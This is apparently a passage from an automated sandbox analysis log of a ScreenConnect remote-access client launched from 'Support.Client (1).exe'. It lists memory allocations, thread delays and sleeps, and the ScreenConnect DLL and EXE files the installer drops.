                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2CAD88F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2CAF2380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: 7B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: 1A460000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: C60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: 2630000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: 4630000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: 1EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: 2160000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeMemory allocated: 1EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: FD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: 1AAF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: B80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599668Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599444Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599195Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597260Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597112Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595055Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593807Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592379Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591688Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2193Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7333Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Support.Client (1).exe TID: 6892Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599668s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599560s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599444s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -599195s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -598969s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597438s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597260s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -597112s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -595055s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594594s >= -30000sJump to behavior
